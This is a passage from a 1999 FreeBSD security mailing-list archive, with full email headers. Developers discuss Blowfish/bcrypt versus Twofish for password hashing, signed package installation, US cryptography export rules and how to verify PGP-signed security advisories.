<21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> <199905021541.RAA02885@greenpeace.grondar.za> <19990502181647.C32819@bitbox.follo.net> <199905021627.SAA03150@greenpeace.grondar.za> <19990502184625.E32819@bitbox.follo.net> Date: Sun, 02 May 1999 18:56:09 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Eivind Eklund wrote: > > Ditto for Kerberos, and Kerberos got there first :-) > > I know - I'm trying to find the lesser of the two evils. That's why I > was asking if it was used outside of Kerberos itself. Only kerberised tools like X, fetchmail, sudo, oracle and so on. :-) > They use x.509 and the Sun package signature standard. As far as I > remember, it would be possible to re-implement parts of the code based > on something other than x.509 (e.g, DSA) and still be marginally > compliant (no other tools would work, but the standard allows > alternate signature algorithms, and signatures based on several public > key system on the same package). However, that would be more work > than I'll have time for in the forseeable future :-( Hmm - some of that stuff can be added to libmd with ease :-) > The code was written with the assumption that we could make it work by > just requiring the libcrypto from (then) SSLeay in order to actually > do any signature checking by just opening it dynamically and check > signatures if it was there. May I see the code? M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 10: 0:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id C1CE5153AE for ; Sun, 2 May 1999 10:00:51 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id TAA17977; Sun, 2 May 1999 19:00:50 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id TAA33749; Sun, 2 May 1999 19:00:50 +0200 (MET DST) Date: Sun, 2 May 1999 19:00:50 +0200 From: Eivind Eklund To: Mark Murray Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990502190049.G32819@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> <199905021541.RAA02885@greenpeace.grondar.za> <19990502181647.C32819@bitbox.follo.net> <199905021627.SAA03150@greenpeace.grondar.za> <19990502184625.E32819@bitbox.follo.net> <199905021656.SAA03362@greenpeace.grondar.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <199905021656.SAA03362@greenpeace.grondar.za>; from Mark Murray on Sun, May 02, 1999 at 06:56:09PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 02, 1999 at 06:56:09PM +0200, Mark Murray wrote: > > The code was written with the assumption that we could make it work by > > just requiring the libcrypto from (then) SSLeay in order to actually > > do any signature checking by just opening it dynamically and check > > signatures if it was there. > > May I see the code? Sure - I put it at http://www.freebsd.org/~eivind/pkg_install.tar.gz Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 10:16:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id 141BD14E13; Sun, 2 May 1999 10:16:09 -0700 (PDT) (envelope-from mark@grondar.za) Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.3/8.9.3) with ESMTP id TAA36613; Sun, 2 May 1999 19:16:07 +0200 (SAST) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id TAA03488; Sun, 2 May 1999 19:16:06 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199905021716.TAA03488@greenpeace.grondar.za> To: Eivind Eklund Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: Your message of " Sun, 02 May 1999 19:00:50 +0200." <19990502190049.G32819@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> <199905021541.RAA02885@greenpeace.grondar.za> <19990502181647.C32819@bitbox.follo.net> <199905021627.SAA03150@greenpeace.grondar.za> <19990502184625.E32819@bitbox.follo.net> <199905021656.SAA03362@greenpeace.grondar.za> <19990502190049.G32819@bitbox.follo.net> Date: Sun, 02 May 1999 19:16:05 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Eivind Eklund wrote: > > May I see the code? > > Sure - I put it at http://www.freebsd.org/~eivind/pkg_install.tar.gz Nope. 404. M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 10:17:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 8CE7D15419 for ; Sun, 2 May 1999 10:17:43 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id TAA18144; Sun, 2 May 1999 19:17:42 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id TAA33853; Sun, 2 May 1999 19:17:40 +0200 (MET DST) Date: Sun, 2 May 1999 19:17:40 +0200 From: Eivind Eklund To: Mark Murray Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990502191740.J32819@bitbox.follo.net> References: <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> <199905021541.RAA02885@greenpeace.grondar.za> <19990502181647.C32819@bitbox.follo.net> <199905021627.SAA03150@greenpeace.grondar.za> <19990502184625.E32819@bitbox.follo.net> <199905021656.SAA03362@greenpeace.grondar.za> <19990502190049.G32819@bitbox.follo.net> <199905021716.TAA03488@greenpeace.grondar.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <199905021716.TAA03488@greenpeace.grondar.za>; from Mark Murray on Sun, May 02, 1999 at 07:16:05PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 02, 1999 at 07:16:05PM +0200, Mark Murray wrote: > Eivind Eklund wrote: > > > May I see the code? > > > > Sure - I put it at http://www.freebsd.org/~eivind/pkg_install.tar.gz > > Nope. 404. Sorry - the correct URL is http://www.freebsd.org/~eivind/pkg_install.tgz My bad - I'm not in the habit of using .tgz as an extension, but the archive was created by one of my coworkers. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 10:29:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id E236C14E13; Sun, 2 May 1999 10:29:33 -0700 (PDT) (envelope-from mark@grondar.za) Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.3/8.9.3) with ESMTP id TAA36651; Sun, 2 May 1999 19:29:31 +0200 (SAST) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id TAA03576; Sun, 2 May 1999 19:29:29 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199905021729.TAA03576@greenpeace.grondar.za> To: Eivind Eklund Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: Your message of " Sun, 02 May 1999 19:17:40 +0200." <19990502191740.J32819@bitbox.follo.net> References: <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> <199905021541.RAA02885@greenpeace.grondar.za> <19990502181647.C32819@bitbox.follo.net> <199905021627.SAA03150@greenpeace.grondar.za> <19990502184625.E32819@bitbox.follo.net> <199905021656.SAA03362@greenpeace.grondar.za> <19990502190049.G32819@bitbox.follo.net> <199905021716.TAA03488@greenpeace.grondar.za> <19990502191740.J32819@bitbox.follo.net> Date: Sun, 02 May 1999 19:29:29 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Eivind Eklund wrote: > Sorry - the correct URL is > http://www.freebsd.org/~eivind/pkg_install.tgz Gottit, thanks! :-) M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 12:48:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from funky.monkey.org (funky.monkey.org [152.160.231.196]) by hub.freebsd.org (Postfix) with ESMTP id D4612151AA; Sun, 2 May 1999 12:48:53 -0700 (PDT) (envelope-from dugsong@monkey.org) Received: by funky.monkey.org (Postfix, from userid 1001) id 51DCD23DC7; Sun, 2 May 1999 15:48:52 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by funky.monkey.org (Postfix) with ESMTP id 4230A15CC2; Sun, 2 May 1999 15:48:52 -0400 (EDT) Date: Sun, 2 May 1999 15:48:52 -0400 (EDT) From: Dug Song To: Eivind Eklund Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: <19990502122142.A289@samurai.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 02, 1999 at 06:16:47PM +0200, Eivind Eklund wrote: > > The point of this exercise would (IMO, at least) only be OpenBSD > compatibility, where OpenBSD for marketeering reasons has decided to > use Blowfish as part of their hash algorithm. marketeering? read the paper being presented by Niels Provos and David Mazieres at next month's USENIX (FREENIX track), and decide for yourself - "A Future-Adaptable Password Scheme": http://www.citi.umich.edu/u/provos/papers/bcrypt.ps.gz this could be rolled into pam_unix for FreeBSD, perhaps. -d. --- http://www.monkey.org/~dugsong/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 14: 7:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from quark.ChrisBowman.com (crbowman.erols.com [209.122.47.155]) by hub.freebsd.org (Postfix) with ESMTP id 51DC714EA5 for ; Sun, 2 May 1999 14:07:19 -0700 (PDT) (envelope-from crb@ChrisBowman.com) Received: from fermion (fermion.ChrisBowman.com [10.0.1.2]) by quark.ChrisBowman.com (8.9.2/8.8.8) with SMTP id RAA09266; Sun, 2 May 1999 17:05:14 -0400 (EDT) (envelope-from crb@ChrisBowman.com) Message-Id: <199905022105.RAA09266@quark.ChrisBowman.com> X-Sender: crb@quark X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0.1 Date: Sun, 02 May 1999 17:04:09 -0400 To: "Jeroen C. van Gelderen" From: "Christopher R. Bowman" Subject: Re: Blowfish/Twofish Cc: "Harry M. Leitzell" , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG In-Reply-To: <372C2001.BEA307F6@vangelderen.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:50 AM 5/2/99 +0200, Jeroen C. van Gelderen wrote: >"Harry M. Leitzell" wrote: >> 2) Can we still do the moving by paper to another >> country and scanning it in? Is that legitimate or >> been deemed illegal? > >Yes and no. Yes, if you publish it it is covered by the first >amendement and you can freely export the book. But you will have >to *publish* the crypto, just printing it in a letter is not good >enough. Fortunately, getting your 'work' published is not that >hard; There are companies that specialize in low volume >printing... I believe this is and under broad interpretation of the 1st Amendment. If you publish it as a book it is certainly covered but the contra positive is not also true. Saying that it must be published as a book would be analogous to saying that the New York times is entitled to free speech but I am not simply by virtue of the fact that they can afford those big (or indeed any) presses and I must write my work out in long hand. Can you provide more information regarding how you came to the above conclusion? -------- Christopher R. Bowman crb@ChrisBowman.com http://www.ChrisBowman.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 15:38:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id C80911508B for ; Sun, 2 May 1999 15:38:51 -0700 (PDT) (envelope-from jeroen@vangelderen.org) Received: from ut243008.inbel.utwente.nl ([130.89.243.8]:33555 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <8020-20164>; Mon, 3 May 1999 00:38:39 +0200 Message-ID: <372CD3E1.9AA3444D@vangelderen.org> Date: Mon, 03 May 1999 00:38:25 +0200 From: "Jeroen C. van Gelderen" X-Mailer: Mozilla 4.51 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: "Christopher R. Bowman" Cc: "Harry M. Leitzell" , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish References: <199905022105.RAA09266@quark.ChrisBowman.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [This is getting off-topic...] "Christopher R. Bowman" wrote: > > At 11:50 AM 5/2/99 +0200, Jeroen C. van Gelderen wrote: > >"Harry M. Leitzell" wrote: > >> 2) Can we still do the moving by paper to another > >> country and scanning it in? Is that legitimate or > >> been deemed illegal? > > > >Yes and no. Yes, if you publish it it is covered by the first > >amendement and you can freely export the book. But you will have > >to *publish* the crypto, just printing it in a letter is not good > >enough. Fortunately, getting your 'work' published is not that > >hard; There are companies that specialize in low volume > >printing... > > I believe this is and under broad interpretation of the 1st Amendment. If you > publish it as a book it is certainly covered but the contra positive is not > also true. Saying that it must be published as a book would be analogous to > saying that the New York times is entitled to free speech but I am not simply > by virtue of the fact that they can afford those big (or indeed any) presses > and I must write my work out in long hand. Unfortunately, there is a difference between the rights you have and the rights your government wants you to have. The first amendement probably gives you the right to export cryptographic source code, but are you prepared to and do you have the money+time to defend those rights in court? Check out http://www.eff.org/ and http://www.epic.org/ for more information on how the US government deals with cryptographic matters, your rights and the constitution. Don't discuss it on this list though, it's getting off-topic. > Can you provide more information regarding how you came to the above > conclusion? The NAI people in charge of exporting PGP (on paper) told me. But let me repeat that I'm not qualified to give you legal advise. I'm basically telling you to err on the safe side... Cheers, Jeroen -- Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 17:44: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from WEBBSD1.turnaround.com.au (webbsd1.turnaround.com.au [203.39.138.49]) by hub.freebsd.org (Postfix) with ESMTP id BEAB614D34 for ; Sun, 2 May 1999 17:44:05 -0700 (PDT) (envelope-from A_Johns@TurnAround.com.au) Received: from TurnAround.com.au (dhcp64.turnaround.com.au [192.168.1.64]) by WEBBSD1.turnaround.com.au (8.8.7/8.8.7) with ESMTP id KAA08441; Mon, 3 May 1999 10:54:07 +1000 (EST) (envelope-from A_Johns@TurnAround.com.au) Message-ID: <372CF161.B9FFE751@TurnAround.com.au> Date: Mon, 03 May 1999 10:44:17 +1000 From: Andrew Johns Organization: TurnAround Solutions P/L X-Mailer: Mozilla 4.5 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: Gustavo V G C Rios Cc: security@FreeBSD.ORG Subject: Re: security advisories References: <372B8ACA.764E20FD@tdnet.com.br> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Gustavo V G C Rios wrote: > > The page http://www.freebsd.org/security/ has some advisories, but how > can i work with them? How to read the *.asc files? Which softwares > should i use to read them ? > > Thanks a lot! > They are plain text files - try cat, more, vi in Unix, or something capable of fixing the CR <-> CRLF in the M$ world -- Regards | _/\_/\ Andrew Johns BSc (Comp Sci) | / \ TurnAround Solutions Pty Ltd | \_...__/ http://www.turnaround.com.au/ | \/ "The box said 'Requires Windows 98, NT, Linux or better' so I installed FreeBSD." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 18:33:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id BBF9014C34 for ; Sun, 2 May 1999 18:33:53 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.2/8.9.1) id DAA40084; Mon, 3 May 1999 03:33:38 +0200 (CEST) (envelope-from des) To: Gustavo V G C Rios Cc: security@FreeBSD.ORG Subject: Re: security advisories References: <372B8ACA.764E20FD@tdnet.com.br> From: Dag-Erling Smorgrav Date: 03 May 1999 03:33:37 +0200 In-Reply-To: Gustavo V G C Rios's message of "Sat, 01 May 1999 20:14:18 -0300" Message-ID: Lines: 15 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Gustavo V G C Rios writes: > The page http://www.freebsd.org/security/ has some advisories, but how > can i work with them? How to read the *.asc files? Which softwares > should i use to read them ? The .asc files are not human-readable - they're cryptographic signatures intended to authenticate the originator of each advisory. I believe they're PGP signatures - to verify them, I guess you would first add the relevant PGP keys to your keyring, then submit the advisory and the signature to PGP. The PGP keys used by the FreeBSD security officers are included in the FreeBSD handbook. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 18:42:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (weathership.homeport.org [207.31.235.99]) by hub.freebsd.org (Postfix) with ESMTP id B063F156B9 for ; Sun, 2 May 1999 18:42:28 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id VAA23008; Sun, 2 May 1999 21:54:31 -0400 (EDT) Date: Sun, 2 May 1999 21:54:31 -0400 From: Adam Shostack To: "Jeroen C. van Gelderen" Cc: Robert Watson , Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990502215431.A22973@weathership.homeport.org> References: <372C19F5.625BB2B@vangelderen.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: <372C19F5.625BB2B@vangelderen.org>; from Jeroen C. van Gelderen on Sun, May 02, 1999 at 11:25:09AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 02, 1999 at 11:25:09AM +0200, Jeroen C. van Gelderen wrote: | Robert Watson wrote: | [...] | > I'd recommend against using Blowfish--go for Twofish. | | Regardless of what you think about Blowfish, recommending Twofish | is a very, very bad move. The golden rule in crypto is that trust | comes with the age of an algorithm. Twofish is waaaay to young to | be trusted, especially since it's an evolutionary improvement | over Blowfish which you don't like for some reason. | | In any case, if you recommend against using Blowfish, what's the | reason? The reason not to use Blowfish is (imho) the Pi key scheduling. Key schedules need to be designed, not taken at random from nature. The reason to not use it for passwords is that the function you want (if you're going to not change the model), is a hash function, not a block cipher. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 18:59:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 5852A156B9 for ; Sun, 2 May 1999 18:59:48 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id LAA19577; Mon, 3 May 1999 11:29:36 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA17450; Mon, 3 May 1999 11:30:12 +0930 Date: Mon, 3 May 1999 11:30:12 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Adam Shostack Cc: "Jeroen C. van Gelderen" , Robert Watson , Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@freebsd.org Subject: Re: Blowfish/Twofish In-Reply-To: <19990502215431.A22973@weathership.homeport.org> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 2 May 1999, Adam Shostack wrote: > The reason not to use Blowfish is (imho) the Pi key scheduling. Key > schedules need to be designed, not taken at random from nature. Regardless, it seems to have stood up pretty well to cryptanalysis so far - see www.counterpane.com for literature references. > The reason to not use it for passwords is that the function you want > (if you're going to not change the model), is a hash function, not a > block cipher. I was under the impression that there are standard methods for converting good block ciphers into good hash functions - I'd be surprised if this wasn't what was being done with the OpenBSD password support. Kris ----- "That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye" "Wow, That's sharp!" - Rimmer and the Cat, _Red Dwarf_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 19: 3: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from alcanet.com.au (border.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (Postfix) with ESMTP id 39F8915728 for ; Sun, 2 May 1999 19:02:56 -0700 (PDT) (envelope-from peter.jeremy@auss2.alcatel.com.au) Received: by border.alcanet.com.au id <40331>; Mon, 3 May 1999 11:48:10 +1000 Date: Mon, 3 May 1999 12:02:44 +1000 From: Peter Jeremy Subject: Re: Blowfish/Twofish To: adam@homeport.org Cc: freebsd-security@FreeBSD.ORG Message-Id: <99May3.114810est.40331@border.alcanet.com.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Adam Shostack wrote: >The reason to not use it for passwords is that the function you want >(if you're going to not change the model), is a hash function, not a >block cipher. You'd better let Bob Morris know this :-). Why can't a block cipher (like, say DES) be used for a password hashing function? (I realise that the DES used for Unix password hashing is `tweaked', but that was done solely to prevent people using off-the-shelf DES hardware to crack passwords - the salt can be injected in several other ways). The MD5 description includes a simple algorithm for taking an arbitrary string of bits and feeding it though a block hash function. Exactly the same can be done with a block cipher. Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 23:10:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from shibumi.feralmonkey.org (shibumi.feralmonkey.org [203.41.114.182]) by hub.freebsd.org (Postfix) with ESMTP id 8F7C315A2E for ; Sun, 2 May 1999 23:10:04 -0700 (PDT) (envelope-from nick@shibumi.feralmonkey.org) Received: from localhost (nick@localhost) by shibumi.feralmonkey.org (8.9.2/8.9.2) with ESMTP id RAA03897; Mon, 3 May 1999 17:00:05 GMT (envelope-from nick@shibumi.feralmonkey.org) Date: Mon, 3 May 1999 17:00:03 +0000 (GMT) From: 0x1c To: "Harry M. Leitzell" Cc: Robert Watson , Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On a similar note, is there any restriction on one-way hashing algorithms? I forget. Nick On Sat, 1 May 1999, Harry M. Leitzell wrote: > I am unaware of the restriction laws placed upon the US in terms of > encryption. Could someone clarify them for me? > > 1) If Robert were to write code on a machine that is in a foreign > country, would it have been considered exported? (Xterm on a cs.hut.fi > machine for example to code in) Even if he is in the US while doing so? > > 2) Can we still do the moving by paper to another country and > scanning it in? Is that legitimate or been deemed illegal? > > 3) If I write a disk encryptor that sits on the MBR and transfer the > disk out of country, is that a no-no? > > Thanks > > On Sat, 1 May 1999, Robert Watson wrote: > > > > > So I'd gladly write this code, as well as do a number of other > > crypto-related things, but I'm inside the US. Someone outside the US will > > have to take this initiative, I'm afraid. > > > > I'd recommend against using Blowfish--go for Twofish. > > > > On Sat, 1 May 1999, Poul-Henning Kamp wrote: > > > > > In message , The Tech-Admin Du > > > de writes: > > > > > > >This is something i've wanted to know for a long time :).. It should adopt > > > >the passwd.conf settings from OpenBSD with selection of encryption, ratio, > > > >etc.. OpenBSD has a very good feature with that and it would be great if > > > >FreeBSD adopted it! :-) > > > > > > Make patches > > > send-pr > > > > > > -- > > > Poul-Henning Kamp FreeBSD coreteam member > > > phk@FreeBSD.ORG "Real hackers run -current on their laptop." > > > FreeBSD -- It will take a long time before progress goes too far! > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > Robert N Watson > > > > robert@fledge.watson.org http://www.watson.org/~robert/ > > PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 > > > > Carnegie Mellon University http://www.cmu.edu/ > > TIS Labs at Network Associates, Inc. http://www.tis.com/ > > Safeport Network Services http://www.safeport.com/ > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-] > Harry M. Leitzell - Harry_M_Leitzell@cmu.edu > Carnegie Mellon University > Finger for PGP Public Key > [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-] > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Therefore those skilled at the unorthodox are as infinite as heaven and earth, inexhaustible as the great rivers. -- Sun Tzu, The Art of War To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 23:14:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 862C41500B for ; Sun, 2 May 1999 23:14:29 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id CAA17176; Mon, 3 May 1999 02:11:02 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Mon, 3 May 1999 02:11:02 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: 0x1c Cc: "Harry M. Leitzell" , Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I don't believe so, as long as they are not just crypto algorithms. I.e., I believe our DES hashing is not exportable, whereas our MD5 hashing is. In a sense, it's all a matter of perspective on how you use an algorithm. It's all just mathematics, right? Sort of like you can't patent mathematical formulas, but you can patent algorithms. :) So SHA-1 support for FreeBSD would be quite exportable, I'd imagine, and would probably make a worthwhile addition. I don't see Blowfish as a great addition other than the interoperability concerns expressed previously. Far more important, in my mind, is making the IPsec/IPv6 code part of the base distribution. If I really want your password, I'll sniff it or trojan a binary once I have root, something that I already have to have to get your password file in almost all cases. On Mon, 3 May 1999, 0x1c wrote: > On a similar note, is there any restriction on one-way hashing algorithms? > I forget. > > Nick > > On Sat, 1 May 1999, Harry M. Leitzell wrote: > > > I am unaware of the restriction laws placed upon the US in terms of > > encryption. Could someone clarify them for me? > > > > 1) If Robert were to write code on a machine that is in a foreign > > country, would it have been considered exported? (Xterm on a cs.hut.fi > > machine for example to code in) Even if he is in the US while doing so? > > > > 2) Can we still do the moving by paper to another country and > > scanning it in? Is that legitimate or been deemed illegal? > > > > 3) If I write a disk encryptor that sits on the MBR and transfer the > > disk out of country, is that a no-no? > > > > Thanks > > > > On Sat, 1 May 1999, Robert Watson wrote: > > > > > > > > So I'd gladly write this code, as well as do a number of other > > > crypto-related things, but I'm inside the US. Someone outside the US will > > > have to take this initiative, I'm afraid. > > > > > > I'd recommend against using Blowfish--go for Twofish. > > > > > > On Sat, 1 May 1999, Poul-Henning Kamp wrote: > > > > > > > In message , The Tech-Admin Du > > > > de writes: > > > > > > > 